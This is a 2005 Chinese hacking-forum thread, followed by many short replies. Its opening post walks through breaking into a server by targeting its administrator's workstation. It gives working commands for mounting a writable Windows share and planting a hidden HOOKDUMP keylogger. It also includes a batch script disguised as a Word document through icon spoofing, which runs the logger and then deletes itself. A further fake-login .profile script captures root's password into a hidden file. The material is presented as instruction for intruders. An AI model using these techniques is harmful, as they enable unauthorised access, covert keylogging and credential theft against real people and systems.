作 者	主题:一种很奇特的入侵主机的方法 <转>
8626280 =一知半解= 积分：286 贴数：285	日期：2005-3-16 0:05:25 Once upon a time，我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，从aaa帐号试到zzz（bye the way，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比，如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧），结果一个帐号也不存在，我没有再试它的帐号。因为我被它开的端口吸引住了，它开着WWW，我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在，我KAO，I服了YOU！也有几个错误，我不知道如何利用，算了。又绕着主机转了几圈，象狐狸遇见刺猬，无从下嘴。  还是看看root的信息吧：finger root@xxx.xxx.xxx  Login name: root In real life: system PRIVILEGED account  Directory: / Shell: /bin/sh  Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx  No Plan.  root经常来，那个202.xx.xx.xx就是他用的工作站了，从那会不会看到点东西呢？  net view \202.xx.xx.xx  Shared resources at \202.xx.xx.xx  Sharename Type Comment  x  x  我的公文包 Disk  The command was completed successfully.  在上网的机器上开着WINDOWS的“文件和打印机共享”的服务，是很多人容易掉以轻心的，这个root没有例外。如果它的C盘共享了而且可写那就好了，但那是做梦，现在开了共享的目录没有一个是根目录，连D驱的都没有，别着急，慢慢来。x掉的那些文件夹都没用，不能写，里面尽是些英文原著，这个root还挺行的。“我的公文包”吸引了我的注意，这是一个用于将不同的机器上的资料进行同步的工具，很显然这个root要经常更新主机上的主页，有时候在自己的机器上编，有时候在主机上编……所以很重要的一点：“我的公文包”的共享一般都是可写的！  那我再进去看看。  >net use i: \202.xx.xx.xx  >i:  >echo asdf>temp.txt  不错，确实可写  >del temp.txt  不留痕迹——黑客的习惯  >dir/od/p  看看都有些什么……倒数第二排那个是什么？“X月工作计划.doc”！就是它了，即然是计划就不可能写完了就丢一边，它肯定会再次打开它的——至少下个月写计划时要COPY一下:->  该动手了，我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件HOOKDUMP，我觉得它挺好的，价钱实惠，量也足……对不起，说习惯了，应该是它不仅记录下全部击键，还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单……总之，它的记录让你就和你站在他身后看他操作计算机一样详细了。您要问那么多木马你为啥装这个？要知道无论是中国的冰河、netspy还是外国的netbus、BO，都被各种杀毒软件列为头号侦查对象，而一个root的机器上可不可能没装杀毒软件？还是HOOKDUMP好，小小的，不起眼，不过如果大家都用只怕我再用它的机会就少了……  >copy hookdump.* i:  补充一点：上传前先编好它的hookdump.ini文件，置为隐藏方式运行，不然root一运行屏幕上蹦出一大窗口可就溴大了。  然后再在自己的机器上编一个同名的BAT文件：X月工作计划.BAT  >edit c:\X月工作计划.BAT  @echo off  hookdump  attrib -h X月工作计划.doc  c:\progra~1\micros~1\office\winword X月工作计划.doc  attrib -h temp.bat  del temp.pif  del temp.bat  看明白了吧？root运行了这个BAT文件实际上就是先运行木马，再调用WINWORD文件打开它想开的这个文件，然后自我删除，也许它机器上WINWORD的位置不同，那调用就会失败，不过不要紧，反正BAT会马上删除，他会以为是自己的误操作。  这时你的C驱根目录就有了这么一个BAT文件，它是一个方形的图标，和那个WORD文件大相径庭，root怎么会运行它呢？没关系，在这个文件上点右键，点属性，在“程序”栏选“更改图标”不就行了吗？WORD的图标在你机器c:\progra~1\micros~1\offic中。还要将“运行”改为“最小化”，“退出时关闭”打上勾，这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个，还有一个PIF文件就是它的图标。  把这两个文件传上去：  >copy X月工作计划.bat i:  >copy X月工作计划.pif i:  然后把它的文件和自己的文件都藏起来：  >attrib +h X月工作计划.doc  >attrib +h X月工作计划.bat  这样，root的“公文包”里只剩下一个和原来一模一样的WORD图标，他做梦也没想到这已变成了一个BAT文件。然后可以喘口气了，让我们静静的等……  几天后，我进入这个工作站，取下记录下来的击键记录，找出root的口令，进入主机。  ------------------------------------------------------  看明白了吗？这种入侵方法就是对那些铜墙铁壁的主机不是强往里冲而是查操作该主机的root所使用的机器，那是他的“座机”，“舒适”才是他想要的，因此强度也就大大减小。进入他的“座机”后跟踪他的操作，不就轻易的获得钥匙了吗？顺便说一下，其实那个“我的公文包”文件夹的共享是加了口令的，我另费了一番周折才进去，不过这和入侵方式无关，我下回再讲怎么进有口令的共享文件夹。  好了，看在我敲得手指发麻的份上，您也该回答我一个问题了：  条件：已获得某主机的rootshell，假设名为.fool (-rwsr-xr-x 1 root system 131072 .fool)  目标：获得该主机root的帐号  提示：方法一:即然已是root，可以装一个sniffer，嗅探口令，不过主机是Digital 4.0B，常见的esniff，dsniff，sniffit都不能运行，你再推荐一个？  方法二：做一个假LOGIN的SHELL，将原LOGIN程序改名，收集了帐号的口令后调用真的LOGIN程序，但我发现LOGIN程序一旦改名就不能运行了！  方法三：在root的HOME目录中改它的.profile如下：  clear  echo  echo  echo "Digital UNIX (lwh000) (ttyp0)"  echo  echo "login:root"  echo "Password:"  echo "Login incorrect"  echo "login:\c"  read lgin  stty -echo  echo "Password:\c"  read pw  stty echo  echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk  echo  echo "Last login: Tue Jul 18 11:05:25 from pa1002"  echo  echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000"  # 中间这一段太长，就不写了，实际上就是伪装主机的欢迎词  echo  echo  # 这以下是root的原.profile  PATH=$HOME/bin:$  export PATH  if [ ! "$DT" ]; then  stty dec  tset -I -Q  fi  看出来没，实际上root正确登录后，第一句clear擦掉欢迎词，然后伪写登录不成功，让他再输一次，然后记录下来，再伪写上欢迎词，执行正常的.profile内容。  但是TELNET反应是较慢的，第一句clear再快也能看出屏幕有一个闪烁，细心的root也许会留意，如果能关掉UNIX的欢迎词就好了，怎么做？  当然，只要能达成目标，您尽可以提出您的方法，不要拘泥于我想的这几种。
痴情男孩 =化零为整= 积分：13 贴数：13	日期: 2005-3-17 22:06:56   什么玩意!??
我给忘了 =化零为整= 积分：13 贴数：16	日期: 2005-3-18 10:06:42   没看懂 我还是太菜
cololf =化零为整= 积分：11 贴数：11	日期: 2005-3-18 14:10:57   别发在零起点吧！
ngy0111 =化零为整= 积分：14 贴数：14	日期: 2005-3-24 0:40:03   哈哈
cxxl =化零为整= 积分：87 贴数：28	日期: 2005-3-24 3:45:57   我太菜了
ggsqqr =一知半解= 积分：141 贴数：167	日期: 2005-3-24 11:50:03   这是零点起 太深了
小黑学徒 =化零为整= 积分：-3 贴数：25	日期: 2005-3-24 12:54:18   逗是，偶还是菜鸟哦，老大偶看不懂，等偶学会了编程再说
rufeng321 =化零为整= 积分：41 贴数：55	日期: 2005-3-24 13:37:47   欺负我门 ！！ 同志门努力啊！ 摆脱菜！！
1984324dlm =化零为整= 积分：39 贴数：37	日期: 2005-4-12 8:25:12   为我们是菜鸟默哀三分钟，抬起头来就永不做菜鸟了。
一点点 =化零为整= 积分：59 贴数：70	日期: 2005-4-12 19:33:44   有志气，好
yingsu =化零为整= 积分：4 贴数：4	日期: 2005-4-15 22:06:39   读书万遍  自通！！！1
yingsu =化零为整= 积分：4 贴数：4	日期: 2005-4-15 22:06:39   读书万遍  自通！！！1
jim0 =化零为整= 积分：8 贴数：7	日期: 2005-4-15 23:30:42   能教我吗？谢谢
autumnleaves =化零为整= 积分：4 贴数：4	日期: 2005-4-16 14:27:52   qq:252915145
飞月 =一知半解= 积分：359 贴数：263	日期: 2005-4-16 20:11:03   看不懂
云飘飘 =化零为整= 积分：6 贴数：6	日期: 2005-4-17 15:46:01   我也想做黑客。可是我太菜了
373360051 =化零为整= 积分：2 贴数：2	日期: 2005-4-18 9:29:04   他说的是 天文嘛~ 我是看不懂
xujintao =化零为整= 积分：2 贴数：4	日期: 2005-4-18 12:39:42   ~~~~~~~~~~~~``
.abu. =凤舞九天= 头衔:山贼 职务:-=站长=- 积分：6339 贴数：5929	日期: 2005-4-18 19:16:32   写的已经是非常简单明了了。 如果一点自学精神都没有 就不要玩hack了，放弃吧。 楼主转的这篇帖子的主要精华就是一个hacking过程中的思路。 目标是一台UNIX服务器，但是很难进入，那么作者就转而尝试从其他途径进行渗透，想办法进入了UNIX服务器使用者（也就是网管）自己所使用的机器，并在上面通过最简单有效的方法加载了键盘记录程序，记录下所有键盘敲击行为，自然，也就会得到UNIX服务器的账号以及密码了。 鄙视无聊灌水者。
坏坏燕 =化零为整= 积分：3 贴数：3	日期: 2005-4-19 20:44:48   偶菜~~偶也爱国~~坚决不学 鸡肠~~
某个人的马甲 =化零为整= 积分：63 贴数：67	日期: 2005-5-9 19:43:30   站长说的很好！作黑客必须有聪明的头脑！ 但也有一定的运气！ 一种方法不可以 你就要常识另一个方法！ 不懂可以理解，但不要凌辱他人！ 邪恶的化身。 正义的使者！ 祖国的尊严
cxfjkl =化零为整= 积分：1 贴数：1	日期: 2005-5-11 11:15:42   别在这里混.我受不了.我还年轻
beckhampq =化零为整= 积分：4 贴数：8	日期: 2005-5-14 22:52:07   正点.. 我们就是需要这东西.. hacking不是一步到位,是有意义的.有空别老往色情网上泡.
agnesalex =化零为整= 积分：1 贴数：3	日期: 2005-5-16 3:08:54   真是不错，学习中
shhachqi =化零为整= 积分：4 贴数：4	日期: 2005-5-21 16:31:21   有些难
cdbchina =化零为整= 积分：16 贴数：16	日期: 2005-7-1 15:38:02   不懂。。但希望过段时间能看懂。。。
Nameless =化零为整= 积分：27 贴数：41	日期: 2005-7-2 14:25:06   昏迷。暂时离开这个版块一会，这东西有年头了，适合爷爷级人物看
mj_333 =化零为整= 积分：3 贴数：3	日期: 2005-7-3 8:29:31   能看懂一半看来的先去学英文过级在来学hack
ajqpsmtd =化零为整= 积分：1 贴数：1	日期: 2005-7-3 22:24:35   哎～～～太菜了．．没办法！！！！
badboy007 =化零为整= 积分：1 贴数：1	日期: 2005-7-5 12:26:31   有意思。。虽然偶是菜鸟，但偶喜欢看这些东西。。。偶要努力
我叫白 =化零为整= 积分：2 贴数：2	日期: 2005-7-6 15:27:00   看完无语｀！
history_life =化零为整= 积分：8 贴数：7	日期: 2005-7-7 18:55:07   嘿嘿
jackeynie =化零为整= 积分：1 贴数：1	日期: 2005-7-7 21:14:35   看不懂呀？ 好难的
9229504as =化零为整= 积分：2 贴数：2	日期: 2005-7-8 8:24:48   啊 我也刚入行看不大懂 呵呵
天地英雄 =化零为整= 积分：4 贴数：3	日期: 2005-7-10 13:37:02   老大,我们看不懂啊
wfsam =化零为整= 积分：2 贴数：2	日期: 2005-7-10 19:02:30   呵~~~~~~~~~~~~~~   说的容易啊，可是菜鸟入门是要用心学习的，但是每天所学的能不能用上也说不清，但是我想菜鸟想要学的是基础，开始是最难的，所以要给菜鸟一个学习一个开始才是最好的
dntc88 =化零为整= 积分：11 贴数：11	日期: 2005-7-10 22:54:13   我看得头一个贴，就这么难， 天那......受打击了！
lants =化零为整= 积分：2 贴数：5	日期: 2005-7-10 23:45:44   看的不太明白，那个hookdump.ini文件怎么编呀，谢谢了！
天绝 =化零为整= 积分：27 贴数：23	日期: 2005-7-11 12:59:48   好深奥,看的头痛,不过怎样入亲侵网站
激进哈马斯 =一知半解= 积分：309 贴数：764	日期: 2005-7-12 20:23:51   他那个思想挺新的，且不拘泥常规木马，第一次见，受了！
llzhugy =化零为整= 积分：1 贴数：1	日期: 2005-7-21 20:24:28   为什么我看不懂？？
hyahchkhxz =化零为整= 积分：12 贴数：30	日期: 2005-7-22 14:09:19     正在努力中``````````
quink1 =化零为整= 积分：11 贴数：11	日期: 2005-7-31 11:16:20   都是些少知了
85793991 =化零为整= 积分：84 贴数：102	日期: 2005-8-1 13:46:56   我也想做黑客。可是我太菜了。站长说的很好！作黑客必须有聪明的头脑
03752214 =化零为整= 积分：2 贴数：2	日期: 2005-9-1 20:33:08   脑壳都爆了 恼火的很啊
87401720 =化零为整= 积分：18 贴数：60	日期: 2005-9-2 13:29:54   好深澳啊 可以从简单点的说起吗 谢谢
yanfeng =化零为整= 积分：1 贴数：1	日期: 2005-9-2 14:51:42   是呀,就是看不明白,没法子
jefen =化零为整= 积分：5 贴数：5	日期: 2005-9-3 16:05:33   汗啦
徘徊者 =化零为整= 积分：1 贴数：1	日期: 2005-9-8 15:19:26   学习
lifcy =化零为整= 积分：12 贴数：14	日期: 2005-9-9 13:31:12   henhao
nmgbj =化零为整= 积分：5 贴数：7	日期: 2005-9-12 16:54:40   思路确实很奇特。比以往的都有创意。 揭示了人类本能的弱点 不足：1）老鸟不会把office装在默认的目录。       2）网管对任何带有箭头的东西都很反感。
li830317 =化零为整= 积分：3 贴数：3	日期: 2005-9-12 21:30:22   如果可能希望这位大哥用桌面记录器记录下来帮帮我们这些菜．．．．．．．．．鸟吧！ 或者做成动画浅而易懂点
changfeng =一知半解= 积分：263 贴数：276	日期: 2005-9-18 12:37:42   各位的高论真的精彩呀！ 做人一定的实实在在呀。 我还是同意多学一点好呀
semir =化零为整= 积分：5 贴数：5	日期: 2005-9-20 21:10:33   还是没太懂   能不说清楚点
xiaogui =化零为整= 积分：10 贴数：10	日期: 2005-9-20 21:23:53   难是难点，可还是要学的。有些老兄说的对，自学精神很重要！学习中…………
amwlyygy =化零为整= 积分：31 贴数：35	日期: 2005-9-23 6:46:39   唔识英语，没计，想学都唔得。
heike1hao =化零为整= 积分：3 贴数：3	日期: 2005-12-18 15:41:45   来点简单的好吗   黑壳哥哥们
寄生蜂 =化零为整= 积分：9 贴数：9	日期: 2008-6-16 0:56:32   现在看不懂，不代表以后看不懂。学习；努力；奋斗！
返回《黑客零起点精华》 快速返回

IE不断爆出漏洞，使用FireFox浏览器，会更安全一些：

如果您想发帖，请先注册或登录！